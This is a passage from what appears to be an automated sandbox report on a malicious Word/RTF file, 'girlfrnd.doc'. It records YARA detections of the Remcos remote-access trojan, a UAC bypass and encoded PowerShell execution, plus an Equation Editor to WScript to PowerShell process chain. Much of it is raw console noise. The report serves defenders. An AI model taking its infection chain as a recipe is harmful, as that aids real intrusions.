            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040124615_2_00401246
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040CA4615_2_0040CA46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040523515_2_00405235
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004032C815_2_004032C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040168915_2_00401689
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402F6015_2_00402F60
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00308EB816_2_00308EB8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0030978816_2_00309788
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00308B7016_2_00308B70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
            Source: girlfrnd.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: RegAsm.exe PID: 3220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3604, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3888, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: bhv2E13.tmp.12.drBinary or memory string: org.slneighbors
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@27/24@10/6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,12_2_004182CE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_00417952
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,12_2_00418758
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F474
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0041B4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AA4A
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rlfrnd.docJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\shietgtst-A57Q98
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7FD9.tmpJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................p.......f...............................................T..........s............Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................p.......r.......................................X...............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................T.........................s....................f..........s............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................U.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................[.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................[.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................[.........................s....................b.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................[.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........[.........................s..............#..... .......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......\........[.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................\.........................s....................l.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............0\.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............F\.........................s....................l.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......\........\.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......\........\.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................].........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......d.......,].........................s....................T.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............@].........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@...............S].........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..............._].........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............+y.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............8y.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............Ky.........................s....................b.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............Yy.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........ly.........................s..............#..... .......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............zy.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................y.........................s....................l.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................y.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................y.........................s....................l.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................y.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................y.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................y.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................y.........................s....................T.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................y.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@................z.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@................z.........................s..............#.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............O..........................s..............9.....f..........s............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............S..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............K..........................s..............9.....j.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............W..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8.......i..........................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............u..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....j.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......`..................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............*..........................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............6..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@...............H..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............U..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@.......`.......s..........................s..............9.....j.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......`..................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......`..................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@.......`..................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......`..................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@.......`..................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......`..................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@.......`..................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......`..................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@.......`..................................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......`..................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@.......`.......'..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@.......`.......3..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....~.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........$..........................s............8....... .......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............0..........................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............B..........................s..............9.....f.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............N..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............`..........................s..............9.....f.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............l..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............~..........................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@..........................................s..............9.....j.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............8.......".......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............!..........................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............-..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............?..........................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............K..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............]..........................s..............9.............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@...............i..........................s............8.................9.............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..9.....................................(.P.....4.......@...............{..........................s..............9.....`.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....4.......@..........................................s............8.................9.............
